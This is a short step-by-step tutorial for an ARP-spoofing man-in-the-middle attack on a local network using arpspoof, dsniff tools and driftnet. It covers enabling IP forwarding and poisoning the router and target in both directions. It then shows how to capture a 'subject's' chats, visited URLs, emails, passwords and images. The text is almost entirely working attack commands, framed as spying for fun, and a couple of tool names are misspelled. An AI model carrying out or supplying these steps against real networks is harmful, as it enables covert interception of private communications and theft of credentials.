These are the command line tools we will be using to spoof our subject into thinking that we are the router, therefore sending all its network traffice request through us.
Tools: dsniff suite and driftnet.
on Ubuntu: apt-get install driftnet dsniff
Before we get our attack started we’ll need to enable packet forwarding. This means we’ll allow the traffic of our subjects to flow through our machine. We need to switch on ip_forwarding.
1. To check the current setting type: cat /proc/sys/net/ipv4/ip_forward
if you get a "0", it is currently off.
2. Type the ff to turn it on: echo 1 > /proc/sys/net/ipv4/ip_forward
"1" being to switch it on.
3. Then you can check again: cat /proc/sys/net/ipv4/ip_forward
4. Now we have to setup the traffic flow using arpspoof. the switch "-t" means target.
arpspoof -t 10.10.10.1 10.10.10.99 - watch traffic from x.x.x.1 (router) to x.x.x.99 (host)
we'll also to the reverse to watch traffic going the opposite direction:
arpspoof -t 10.10.10.99 10.10.10.1
5. Let the fun begin: OverLord!
msgsnarf -i eth0 - will watch chat sessions and messenger clients (yahoo,gmail,irc...etc)
urlsnart -i eth0 - will URL used by the subject
mailsnarf -i eth0 - will watch for emails
dnsiff -i eth0 - will watch for passwords
driftnet -i eth0 - will watch for pictures on the net
6. To shut down all: killall arpspoof
